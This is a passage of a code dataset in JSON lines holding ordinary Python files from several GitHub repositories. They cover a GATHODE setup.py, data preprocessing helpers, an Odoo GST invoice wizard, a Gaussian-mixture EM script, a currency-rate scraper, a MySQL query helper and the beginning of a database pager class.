`__wrapped__` and eventually throws `ValueError`\n            return getattr (self.__super, name)\n        result = getattr (self.__class__, name)\n        setattr (self, name, result)\n        return result\n    # end def __getattr__\n\n# end class SA_Type\n\nif __name__ != \"__main__\" :\n    MOM.DBW.SAW._Export (\"SA_Type\")\n### __END__ MOM.DBW.SAW.SA_Type\n","repo_name":"xiaochang91/tapyr","sub_path":"_MOM/_DBW/_SAW/SA_Type.py","file_name":"SA_Type.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"580247968","text":"import time\n\n\ndef decorator(func):\n    def wrapper(*args, **kwargs):\n        timer = time.time()\n        result = func(*args, **kwargs)\n        # messages translated from Russian\n        print(f'The function ran in: {time.time() - timer}\\nCalled with arguments:\\n{args}\\n{kwargs}\\nResult: {result}')\n        return result\n    return wrapper\n\n\n@decorator\ndef summa(*args):\n    sum = 0\n    for arg in args:\n        sum += arg\n    return sum\n\n\nsumma(1, 2, 4, 5)\n","repo_name":"MrDumper/Roma","sub_path":"9.1HW.py","file_name":"9.1HW.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20269910094","text":"\"\"\"\nGATHODE: Growth Analysis Tool for High-throughput Optical Density Experiments\n\nGATHODE is a software package for analysing time series of optical\ndensity measurements that were recorded with the help of a plate\nreader. It allows to extract growth parameters such as maximal growth\nrate, lag-time and growth yield.\n\"\"\"\n\nimport sys\nfrom setuptools import setup, find_packages\n\npackagedir = 'platereader'\nversion_py = packagedir+'/_version.py'\n\ndef getVersion():\n    \"\"\" get the version from the file _version.py \"\"\"\n    try:\n        fh=open(version_py, 'r')\n        version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n        fh.close()\n    except:\n        return None\n\n    return version\n\ndef genericSetupDict(app='both'):\n    genericSetupOpts=dict(\n        name = app,\n        version = getVersion(),\n        packages = [packagedir, packagedir+'/parser'],\n        # NOTE PyQt4 is not installable via pip, so this dependency is not listed here\n        install_requires = [\"numpy\",\"scipy\",\"matplotlib\"],\n\n        author = \"Nils Christian\",\n        author_email = \"nils.christian@uni.lu\",\n        url = \"https://platereader.github.io/\",\n        license = \"AGPL\",\n        classifiers=[\n            'Intended Audience :: Science/Research',\n            'Environment :: Console',\n            'Environment :: MacOS X',\n            'Environment :: Win32 (MS Windows)',\n            'Environment :: X11 Applications :: Qt',\n            'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',\n            'Programming Language :: Python :: 2.7',\n            'Programming Language :: Python :: 3',\n        ],\n        keywords = \"plate reader, optical density, growth curve\",\n        )\n    if app == 'both':\n        genericSetupOpts['name'] = 'GATHODE'\n        genericSetupOpts['description'] = \"\"\"Growth and Chronological Life Span Analysis Tools for High-throughput\nOptical Density Experiments (GATHODE/CATHODE)\"\"\"\n        genericSetupOpts['long_description'] = \"\"\"\nThe Growth Analysis Tool for High-throughput Optical Density\nExperiments (GATHODE) is a software package for analysing time series\nof optical density measurements that were recorded with the help of a\nplate reader. It allows to extract growth parameters such as maximal\ngrowth rate, lag-time and growth yield.\nThe Chronological Life Span is defined as the time cells can survive\nin a non-dividing state. 
The Chronological life span Analysis Tool for\nHigh-throughput Optical Density Experiments (CATHODE) uses multiple\noutput files of GATHODE to analyse this survival.\"\"\"\n\n elif app == 'GATHODE':\n genericSetupOpts['description'] = \"Growth Analysis Tool for High-throughput Optical Density Experiments (GATHODE)\"\n genericSetupOpts['long_description'] = \"\"\"\nThe Growth Analysis Tool for High-throughput Optical Density\nExperiments (GATHODE) is a software package for analysing time series\nof optical density measurements that were recorded with the help of a\nplate reader. It allows to extract growth parameters such as maximal\ngrowth rate, lag-time and growth yield.\"\"\"\n\n elif app == 'CATHODE':\n genericSetupOpts['description'] = \"Chronological life span Analysis Tool for High-throughput Optical Density Experiments (CATHODE)\"\n genericSetupOpts['long_description'] = \"\"\"\nThe Chronological Life Span is defined as the time cells can survive\nin a non-dividing state. The Chronological life span Analysis Tool for\nHigh-throughput Optical Density Experiments (CATHODE) uses multiple\noutput files of the Growth Analysis Tool for High-throughput Optical\nDensity Experiments (GATHODE) to analyse this survival.\"\"\"\n\n else:\n raise RuntimeError('no such app \"'+app+'\"')\n\n return genericSetupOpts\n\ndef setupPackage():\n genericSetupOpts=genericSetupDict()\n setup(\n entry_points = {\n 'console_scripts': [\n 'gathodecli = platereader.odcli:odCommandlineInterface',\n 'cathodecli = platereader.clscli:clsCommandlineInterface',\n ],\n 'gui_scripts': [\n 'gathode = platereader.odgui:gui_main',\n 'cathode = platereader.clsgui:clsgui_main',\n ]\n },\n **genericSetupOpts\n )\n\ndef setupOsXapp(app):\n setupOpts=genericSetupDict(app)\n setupOpts['options']={\n 'py2app': { 'argv_emulation': True },\n 'plist': {},\n }\n if app == 'GATHODE':\n setupOpts['app']=['platereader/odgui.py']\n elif app == 'CATHODE':\n setupOpts['app']=['platereader/clsgui.py']\n setup(\n **setupOpts\n )\n\nif __name__ == \"__main__\":\n if len(sys.argv)<=1 or sys.argv[1] == 'version':\n print(getVersion())\n elif len(sys.argv)>1 and sys.argv[1] == 'py2app':\n app='GATHODE'\n if len(sys.argv) > 2:\n app=sys.argv.pop()\n setupOsXapp(app)\n else:\n setupPackage()\n","repo_name":"platereader/gathode","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"24967126273","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelEncoder\nfrom imblearn.under_sampling import RandomUnderSampler\n\n\n\ndef make_stt_weight(df):\n \"\"\"\n Add STT_weight field fucntion\n variable_dic : key = 'hour' value = that hour counts\n\n weight : hour counts / all data counts (list)\n \"\"\"\n variable_dic = {}\n weight = []\n\n # make variable dictionary\n for i in range(len(df.STT_HOUR.value_counts().index)):\n variable_dic[str(df.STT_HOUR.value_counts().index[i])] = df.STT_HOUR.value_counts().values[i]\n\n for hour in df.STT_HOUR.values:\n weight.append(variable_dic[str(hour)] / len(df))\n\n df['STT_weight'] = weight\n\n return df\n\n\ndef make_stt_hour(df):\n \"\"\"\n Add STT_HOUR field function\n \"\"\"\n hours = []\n\n for i in range(len(df)):\n index = df.STT.values[i].index(':')\n hours.append(int(df.STT.values[i][:index]))\n\n df['STT_HOUR'] = hours\n\n return df\n\n\ndef make_stt_term(df):\n \"\"\"\n Add STT_term 
field function\n \"\"\"\n time_term = []\n\n for i in range(len(df)):\n hour = df.STT_HOUR.values[i]\n if 0 <= hour < 7:\n time_term.append(\"dawn\")\n elif 7 <= hour < 12:\n time_term.append(\"morning\")\n elif 12 <= hour < 16:\n time_term.append('afternoon')\n elif 16 <= hour < 20:\n time_term.append(\"peak\")\n else:\n time_term.append(\"evening\")\n\n # attach the computed terms to the frame (otherwise the field is never added)\n df['STT_term'] = time_term\n\n return df\n\n\ndef make_quaruter(df):\n \"\"\"\n Add QUARTER field function\n \"\"\"\n quarters = []\n\n for i in range(len(df)):\n if df[\"SDT_MM\"][i] in (1, 2, 3):\n quarters.append(\"First\")\n elif df[\"SDT_MM\"][i] in (4, 5, 6):\n quarters.append(\"Second\")\n elif df[\"SDT_MM\"][i] in (7, 8, 9):\n quarters.append(\"Third\")\n else:\n quarters.append(\"Fourth\")\n\n df[\"QUARTER\"] = quarters\n\n return df\n\n\ndef make_one_hot_field(df, features):\n \"\"\"\n categorical field(nominal) apply one-hot encoding.\n Add Dummy variable (one-hot)\n \"\"\"\n for feature in features:\n oec = OneHotEncoder()\n X = oec.fit_transform(df[feature].values.reshape(-1, 1)).toarray()\n df_onehot = pd.DataFrame(X, columns=[feature + \"_\" + str(int(i)) for i in range(X.shape[1])])\n df = pd.concat([df, df_onehot], axis=1)\n\n return df\n\n\ndef drop_field(df, features):\n \"\"\"\n Drop fields\n \"\"\"\n df = df.drop(features, axis=1)\n \n return df\n\n\ndef label_encoding(df, features):\n \"\"\"\n ordinal field apply label encoding.\n Input features convert to label field\n :param df: input data frame\n :param features: to convert to label field\n :return: None\n \"\"\"\n for feature in features:\n label_encoder = LabelEncoder()\n df[feature] = label_encoder.fit_transform(df[feature])\n\n return df\n\ndef under_sampling(df):\n \"\"\"\n Using Random Sampling\n \"\"\"\n\n rus = RandomUnderSampler(return_indices=True)\n X_tl, y_tl, id_tl = rus.fit_sample(df, df['DLY'])\n\n # remake data frame.\n columns = df.columns\n df = pd.DataFrame(X_tl, columns=columns)\n # df = df.astype(float)\n\n return df\n","repo_name":"NDjust/Bigcon_airport","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}{"seq_id":"13789092203","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, models\n\n\nclass WizardInvoiceGST(models.TransientModel):\n _name = \"wizard.gst.invoice\"\n\n def get_invoice_line(self, get_invoice_line, obj_invoice_line, gst_invoice_obj, invoice_type):\n invoice_line_data = []\n invoice_line_data_json = {}\n amount_taxed = 0.0\n rate = 0.0\n amt_rate = 0.0\n currency = gst_invoice_obj.currency_id or None\n price = obj_invoice_line.price_subtotal / obj_invoice_line.quantity if obj_invoice_line.quantity > 0 else 0.0\n obj_rate = obj_invoice_line.tax_ids\n if obj_rate:\n for obj_rate in obj_rate:\n if obj_rate.amount_type == \"group\":\n for childObj in obj_rate.children_tax_ids:\n rate = childObj.amount * 2\n invoice_line_data.append(rate)\n break\n else:\n rate = obj_rate.amount\n invoice_line_data.append(rate)\n break\n computed_tax_amount = self.env['wizard.tax.gst'].compute_taxed_amount(\n obj_rate, price, currency, obj_invoice_line, gst_invoice_obj)\n amt_rate = computed_tax_amount[1]\n amt_rate = round(amt_rate, 2)\n amount_taxed = computed_tax_amount[0]\n invoice_line_data_json = self.env['wizard.tax.gst'].gst_tax_data(\n gst_invoice_obj, obj_invoice_line, obj_rate, amount_taxed, invoice_type)\n else:\n amt_rate = obj_invoice_line.price_subtotal\n amt_rate = amt_rate\n if currency.name != 'INR':\n amt_rate = 
amt_rate * currency.rate\n amt_rate = round(amt_rate, 2)\n invoice_line_data.append(0)\n invoice_line_data_json = self.env['wizard.tax.gst'].gst_tax_data(\n gst_invoice_obj, obj_invoice_line, False, amount_taxed, invoice_type)\n data = get_invoice_line + invoice_line_data\n return [data, invoice_line_data_json, rate, amt_rate]\n\n def get_gst_invoice_lines(self, gst_invoice_obj, invoice_type, data, gst_return_type=''):\n data_json = []\n count = 0\n get_rate_data = {}\n rate_data = {}\n get_rate_data_json = {}\n check_itc_eligible = 'Ineligible'\n context = dict(self._context or {})\n if gst_return_type == 'gstr2':\n if context.get('gst_id'):\n res_id = context.get('gst_id')\n current_obj = self.env['gst.return.tool'].browse(res_id)\n check_itc_eligible = current_obj.avail_itc_eligible\n if check_itc_eligible == 'Ineligible':\n check_itc_eligible = gst_invoice_obj.avail_itc_eligible\n for obj_invoice_line in gst_invoice_obj.invoice_line_ids:\n if obj_invoice_line.product_id:\n if obj_invoice_line.product_id.type == 'service':\n if invoice_type == 'impg':\n continue\n else:\n if invoice_type == 'imps':\n continue\n else:\n if invoice_type == 'impg':\n continue\n get_invoice_line = self.get_invoice_line(data, obj_invoice_line, gst_invoice_obj, invoice_type)\n if get_invoice_line:\n rate = get_invoice_line[2]\n amt_rate = get_invoice_line[3]\n if get_invoice_line[1]:\n get_invoice_line[1]['tax_value'] = amt_rate\n if gst_return_type == 'gstr2':\n igst = get_invoice_line[1].get('gst_round_amt') or 0.0\n cgst = get_invoice_line[1].get('cgst_amt') or 0.0\n sgst = get_invoice_line[1].get('sgst_amt') or 0.0\n if rate not in rate_data.keys():\n get_rate_data[rate] = {\n 'taxval': amt_rate,\n 'igst': igst,\n 'cgst': cgst,\n 'sgst': sgst,\n 'cess': 0.0\n }\n else:\n get_rate_data[rate]['taxval'] = get_rate_data[rate]['taxval'] + amt_rate\n get_rate_data[rate]['igst'] = get_rate_data[rate]['igst'] + igst\n get_rate_data[rate]['cgst'] = get_rate_data[rate]['cgst'] + cgst\n get_rate_data[rate]['sgst'] = get_rate_data[rate]['sgst'] + sgst\n get_rate_data[rate]['cess'] = get_rate_data[rate]['cess'] + 0.0\n if gst_return_type == 'gstr1':\n if rate not in rate_data.keys():\n get_rate_data[rate] = {\n 'taxval': amt_rate,\n 'cess': 0.0\n }\n else:\n get_rate_data[rate]['taxval'] = get_rate_data[rate]['taxval'] + amt_rate\n get_rate_data[rate]['cess'] = get_rate_data[rate]['cess'] + 0.0\n if rate not in get_rate_data_json.keys():\n get_rate_data_json[rate] = get_invoice_line[1]\n else:\n for key in get_invoice_line[1].keys():\n if key in ['gst_amt', 'supply_state', 'typ', 'itc_eligibility']:\n continue\n if get_rate_data_json[rate].get(key):\n get_rate_data_json[rate][key] = get_rate_data_json[rate][key] + get_invoice_line[1][key]\n get_rate_data_json[rate][key] = round(get_rate_data_json[rate][key], 2)\n else:\n get_rate_data_json[rate][key] = get_invoice_line[1][key]\n invoice_line = []\n if gst_return_type == 'gstr1':\n invoice_line = get_invoice_line[0] + [get_rate_data[rate]['taxval']]\n if gst_return_type == 'gstr2':\n if invoice_type in ['imps', 'impg']:\n invoice_line = get_invoice_line[0] + \\\n [get_rate_data[rate]['taxval'],\n get_rate_data[rate]['igst']\n ]\n else:\n invoice_line = get_invoice_line[0] + [\n get_rate_data[rate]['taxval'],\n get_rate_data[rate]['igst'],\n get_rate_data[rate]['cgst'],\n get_rate_data[rate]['sgst']\n ]\n if invoice_type == 'b2b':\n if gst_return_type == 'gstr1':\n invoice_line = invoice_line + [0.0]\n if gst_return_type == 'gstr2':\n if check_itc_eligible != 
'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cgst']] + [\n get_rate_data[rate]['sgst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] * 4\n\n elif invoice_type == 'b2bur':\n if check_itc_eligible != 'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cgst']] + [\n get_rate_data[rate]['sgst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] * 4\n elif invoice_type in ['imps', 'impg']:\n if check_itc_eligible != 'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] + [0.0]\n elif invoice_type in ['b2cs', 'b2cl']:\n invoice_line = invoice_line + [0.0, '']\n if invoice_type == 'b2cl':\n bonded_wh = 'Y' if gst_invoice_obj.l10n_in_export_type == 'sale_bonded' else 'N'\n invoice_line = invoice_line + [bonded_wh]\n rate_data[rate] = invoice_line\n import_data = rate_data.values()\n if get_rate_data_json:\n for json_data in get_rate_data_json.values():\n count = count + 1\n if invoice_type == 'b2b' and gst_return_type == 'gstr2':\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tx_s\": 0.0,\n \"tx_c\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n elif invoice_type == 'b2bur':\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tx_s\": 0.0,\n \"tx_c\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n elif invoice_type in ['imps', 'impg']:\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n else:\n data_json.append({\"num\": count, 'itm_det': json_data})\n return [import_data, data_json, get_rate_data, get_rate_data_json]\n\n","repo_name":"planetodooofficial/slc_gst_tds_rewrite","sub_path":"slc_gst_tds_rewrite/wizard/gst_invoice_wizard.py","file_name":"gst_invoice_wizard.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70818549948","text":"\"\"\"\nDescription:\n this is the module provides EM algorithm for GMM.\n\n\"\"\"\n\n# Futures\nfrom __future__ import print_function\n\nimport os\nimport copy\nfrom scipy.stats import norm\nfrom Code.Modules.Data_Generation import *\nfrom Code.Modules.utils import *\n\nsys.path.append('..')\n\n# Built-in/Generic Imports\n\n__author__ = '{Chao ZHOU}'\n__copyright__ = 'Copyright {04/02/2020}, {EM algorithm study}'\n__email__ = '{chaozhouucl@gmail.com}'\n__status__ = '{dev_status}'\n\n\n# {code}\ndef main():\n # ------------------------------------------------------------------------------------------------------------------\n # define project path\n # ------------------------------------------------------------------------------------------------------------------\n project_path = os.path.abspath(os.path.join(os.path.join(os.getcwd(), '..'), '..')) + '/'\n\n # ------------------------------------------------------------------------------------------------------------------\n # generate synthetic data and visualize them\n # 
------------------------------------------------------------------------------------------------------------------\n # GMM data generation\n NO_DATA = 100000\n True_dist_param = {'gaussian1_params': {'gaussian_param_1_mean': 10,\n 'gaussian_param_1_scale': 10},\n 'gaussian2_params': {'gaussian_param_2_mean': 40,\n 'gaussian_param_2_scale': 6, },\n 'mix_coef': [0.3, 0.7]}\n x = gmm_data_generation(NO_DATA, True_dist_param)\n\n # GMM data visualization\n data_path = project_path + 'Data/GMM/'\n write_data(x, file_path=data_path + 'GMM_Samples.pkl')\n plt.plot(x, np.zeros(shape=x.shape))\n plt.savefig(data_path + 'visualization of data.png', format='png')\n plt.close()\n\n # ------------------------------------------------------------------------------------------------------------------\n # initialize a GMM model with known number of cluster=2\n # ------------------------------------------------------------------------------------------------------------------\n NO_cluster = 2\n init_Mix_coef = np.asarray([0.5, 0.5])\n init_gaussain1_param = {'gaussian1_mean': 1, 'guassian1_var': 3}\n init_gaussain2_param = {'gaussian2_mean': 50, 'guassian2_var': 3, }\n init_respons = np.zeros(shape=(NO_DATA, NO_cluster))\n\n new_Mix_coef = copy.deepcopy(init_Mix_coef)\n old_Mix_coef = copy.deepcopy(init_Mix_coef)\n\n new_gaussain1_param = copy.deepcopy(init_gaussain1_param)\n old_gaussain1_param = copy.deepcopy(init_gaussain1_param)\n\n new_gaussain2_param = copy.deepcopy(init_gaussain2_param)\n old_gaussain2_param = copy.deepcopy(init_gaussain2_param)\n\n new_respons = copy.deepcopy(init_respons)\n old_respons = copy.deepcopy(init_respons)\n\n # ------------------------------------------------------------------------------------------------------------------\n # run EM for 10 times\n # ------------------------------------------------------------------------------------------------------------------\n for i in range(10):\n new_respons = EM_E(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef)\n new_gaussain1_param, new_gaussain2_param, new_Mix_coef = EM_M(x, new_respons, new_gaussain1_param,\n\n new_gaussain2_param, new_Mix_coef)\n est__dist_param = {'gaussian1_params': new_gaussain1_param,\n 'gaussian2_params': new_gaussain2_param,\n 'mix_coef': new_Mix_coef\n }\n results_path = project_path + 'Results/GMM/'\n write_data(True_dist_param, file_path=results_path + 'True_dist_params.pkl')\n write_data(est__dist_param, file_path=results_path + 'Est_dist_params.pkl')\n\n\n# E-step\ndef EM_E(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef):\n NO_cluster = len(new_Mix_coef)\n old_respons = copy.deepcopy(new_respons)\n gaussian1 = norm(loc=new_gaussain1_param['gaussian1_mean'],\n scale=new_gaussain1_param['guassian1_var'])\n gaussian2 = norm(loc=new_gaussain2_param['gaussian2_mean'],\n scale=new_gaussain2_param['guassian2_var'])\n gaussian_mixture = [gaussian1, gaussian2]\n for k in range(NO_cluster):\n pi = new_Mix_coef[k]\n gaussian_pdf = gaussian_mixture[k].pdf(x)\n new_respons[:, k] = pi * gaussian_pdf\n\n new_respons = new_respons / np.sum(new_respons, axis=1, keepdims=True)\n print('new respons:\\r\\n')\n print(new_respons)\n return new_respons\n\n\n# M-Step\ndef EM_M(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef):\n NO_DATA = len(x)\n old_gaussain1_param = copy.deepcopy(new_gaussain1_param)\n old_gaussain2_param = copy.deepcopy(new_gaussain2_param)\n old_Mix_coef = copy.deepcopy(new_Mix_coef)\n\n new_Mix_coef = np.sum(new_respons, axis=0, 
keepdims=True) / NO_DATA\n new_Mix_coef = np.squeeze(new_Mix_coef)\n\n new_gaussain1_param['gaussian1_mean'] = np.dot(new_respons[:, 0].T, x) / np.sum(new_respons[:, 0], axis=0)\n new_gaussain2_param['gaussian2_mean'] = np.dot(new_respons[:, 1].T, x) / np.sum(new_respons[:, 1], axis=0)\n\n new_gaussain1_param['guassian1_var'] = np.sqrt(np.dot(new_respons[:, 0].T,\n np.power(x - new_gaussain1_param['gaussian1_mean'],\n 2)) / \\\n np.sum(new_respons[:, 0], axis=0))\n new_gaussain2_param['guassian2_var'] = np.sqrt(np.dot(new_respons[:, 1].T,\n np.power(x - new_gaussain2_param['gaussian2_mean'],\n 2)) / \\\n np.sum(new_respons[:, 1], axis=0))\n print('new mix coeff:\\r\\n')\n print(new_Mix_coef)\n\n print('new gaussian1 params:\\r\\n')\n print(new_gaussain1_param)\n\n print('new gaussian2 params:\\r\\n')\n print(new_gaussain2_param)\n return new_gaussain1_param, new_gaussain2_param, new_Mix_coef\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ChaoEdisonZhouUCL/GMM-and-EM","sub_path":"Code/GMM/GMM.py","file_name":"GMM.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16696460342","text":"from bs4 import BeautifulSoup\nimport csv\nimport lxml\nimport requests\n\nURL = 'https://valuta.kg/'\n\ndef get_html(url):\n r = requests.get(url)\n return r.text\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser') \n items = soup.find('div', class_='rate-list active').find('table', class_='vl-list').find_all('td', class_='td-rate')\n rate_sales = []\n rate =[]\n\n \n for item in items:\n div_= item.find('div', class_='td-rate__wrp').text\n rate_sales.append(div_.replace('\\n', '').replace(' ', '').replace('-', ''))\n \n for item in rate_sales[:8]:\n rate.append(item)\n\n return rate\n\nhtml = get_html(URL)\nvaluta = get_content(html)\n","repo_name":"0murbekov/ExchengePortal","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40125359551","text":"# -*- coding: utf-8 -*-\nimport os\nimport MySQLdb\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nimport pandas as pd\nimport traceback\nimport logging\n\nfrom tools.settings import *\nfrom tools.utility import datetime2str\n\n\nMYSQL_CONF = PROJECT_CONFIG['mysql_rule360_alert']\n\n\nclass MysqlQueryBase():\n def __init__(self):\n self.mysql_con = None\n self.sqlalchemy_con = None\n\n def _init_mysql_connection(self):\n self.mysql_con = MySQLdb.connect(host=MYSQL_CONF['host'], # your host, usually localhost\n user=MYSQL_CONF['username'], # your username\n passwd=MYSQL_CONF['password'], # your password\n db=MYSQL_CONF['defaultdb']) # name of the data base\n\n def _init_sqlalchemy_mysql_connection(self, defaultDB=None):\n db = defaultDB if defaultDB is not None else MYSQL_CONF['defaultdb']\n self.sqlalchemy_con = create_engine('mysql://{}:{}@{}/{}'.format(MYSQL_CONF['username'],\n MYSQL_CONF['password'],\n MYSQL_CONF['host'],\n db))\n\n def _close_all_mysql_connection(self):\n if self.mysql_con is not None:\n self.mysql_con.close()\n if self.sqlalchemy_con is not None:\n self.sqlalchemy_con.dispose()\n\n def query_sample(self):\n self._init_mysql_connection()\n sql = \"\"\"\n SELECT '1';\n \"\"\"\n df = pd.read_sql(sql=sql, con=self.mysql_con)\n self._close_all_mysql_connection()\n return df\n\n def query(self, queryString, logString=''):\n 
logger_.debug('[mysql] Start query {}, sql=\\n{}'.format(logString, queryString))\n self._init_mysql_connection()\n try:\n df = pd.read_sql(sql=queryString, con=self.mysql_con)\n logger_.debug('[mysql] Finish query {}, len(df)={}'.format(logString, len(df)))\n self._close_all_mysql_connection()\n return df\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in query {}, e.message={}\".format(logString, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return None\n\n def execute(self, sqlString, logString='', muteLog=False):\n if not muteLog:\n logger_.debug('[mysql] Start execute {}, sql=\\n{}'.format(logString, sqlString))\n self._init_mysql_connection()\n try:\n cursor = self.mysql_con.cursor()\n result = cursor.execute(sqlString)\n self.mysql_con.commit()\n if not muteLog:\n logger_.debug('[mysql] Finish execute {}, result={}'.format(logString, result))\n self._close_all_mysql_connection()\n return True\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in execute {}, e.message={}\".format(logString, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return False\n\n def updateByID(self, table, col_id, val_id, col_update_ts, **update_params):\n setList = []\n for key, value in update_params.iteritems():\n setList.append(' {}=\"{}\" '.format(key, value))\n sql = '''\n update {table} set {col_update_ts}='{now_ts}', {set_vals} where {col_id}='{val_id}'\n '''.format(table=table, col_update_ts=col_update_ts, now_ts=datetime2str(datetime.now(tz=TIMEZONE)), set_vals=','.join(setList), col_id=col_id, val_id=val_id)\n logger_.debug('[mysql] Start update {}, sql=\\n{}'.format(table, sql))\n self._init_mysql_connection()\n try:\n cursor = self.mysql_con.cursor()\n result = cursor.execute(sql)\n self.mysql_con.commit()\n logger_.debug('[mysql] Finish update {}, result={}'.format(table, result))\n self._close_all_mysql_connection()\n return True\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in update {}, e.message={}\".format(table, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return False\n pass\n\n def insertDF(self, df, tableName, dbName=None, logString=''):\n logger_.debug('[mysql] Start insert df into {}.{}, {}'.format(dbName, tableName, logString))\n self._init_sqlalchemy_mysql_connection(dbName)\n try:\n df.to_sql(name=tableName, con=self.sqlalchemy_con, if_exists='append', index=False)\n self._close_all_mysql_connection()\n return df\n except IntegrityError as e:\n traceback.print_exc()\n self._close_all_mysql_connection()\n logger_.error('[mysql] IntegrityError in insert df into {}.{}, e={}'.format(dbName, tableName, e))\n except Exception as e:\n traceback.print_exc()\n self._close_all_mysql_connection()\n logger_.error(\"[mysql] Exception in insert df into {}.{}, e={}\".format(dbName, tableName, e))\n\n\n# singleton\nmysql_query_instance = MysqlQueryBase()\n","repo_name":"Ernestyj/PyProj","sub_path":"PyProjectTemplate/scheduler/mysql_query/mysql_query_base.py","file_name":"mysql_query_base.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"25328479354","text":"import logging\nimport fcntl\nimport os.path\nimport sys\n\nfrom typing import Tuple\n\nfrom .constants import (\n TABLE_MAX_PAGES,\n PAGE_SIZE,\n EXIT_FAILURE,\n FILE_HEADER_OFFSET,\n FILE_HEADER_SIZE,\n FILE_PAGE_AREA_OFFSET,\n 
FILE_HEADER_VERSION_FIELD_SIZE,\n FILE_HEADER_VERSION_FIELD_OFFSET,\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET,\n FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE,\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_VERSION_VALUE,\n NULLPTR,\n)\n\n\nclass InvalidPageAccess(Exception):\n pass\n\n\nclass DatabaseFileExclusiveLockNotAvailable(Exception):\n \"\"\"Unable to obtain exclusive lock on database file\"\"\"\n\n pass\n\n\nclass Pager:\n \"\"\"\n Manages pages in memory (cache) and on file.\n\n The pager provides page abstraction on top of the file's byte stream.\n From the pager's perspective, the pager sees the file organized like:\n file_header, page_0, page_1, ... page_N-1.\n\n Page allocation is thus:\n - when pages are returned, they are kept in a list (in-memory)\n - when the db is shutdown, the free pages are persisted on disk\n via a singly linked list. The head of this list is stored in the\n file header. Each free page contains the page num of the next free\n page.\n - if a new page is requested, it should be sourced\n in the following order:\n - in memory list of free pages\n - on disk list of free pages\n - end of file (by increasing file by a page size)\n \"\"\"\n\n def __init__(self, filename: str):\n self.header = None\n self.pages = [None for _ in range(TABLE_MAX_PAGES)]\n self.filename = filename\n self.fileptr = None\n self.file_length = 0\n # num of actual pages\n # at startup, this equals the number of pages on disk; once the pager is running\n # it's the number of pages in memory\n self.num_pages = 0\n # number of pages on disk\n self.num_pages_on_disk = 0\n # the next free page num to alloc - should monotonically increase\n self.next_allocatable_page_num = 0\n self.returned_pages = []\n # linked list of free pages\n # whether free page list is set\n self.has_free_page_list = False\n # head node page num\n self.free_page_list_head = NULLPTR\n self.init()\n\n @classmethod\n def pager_open(cls, filename):\n \"\"\"\n Create pager on argument file\n \"\"\"\n return cls(filename)\n\n def 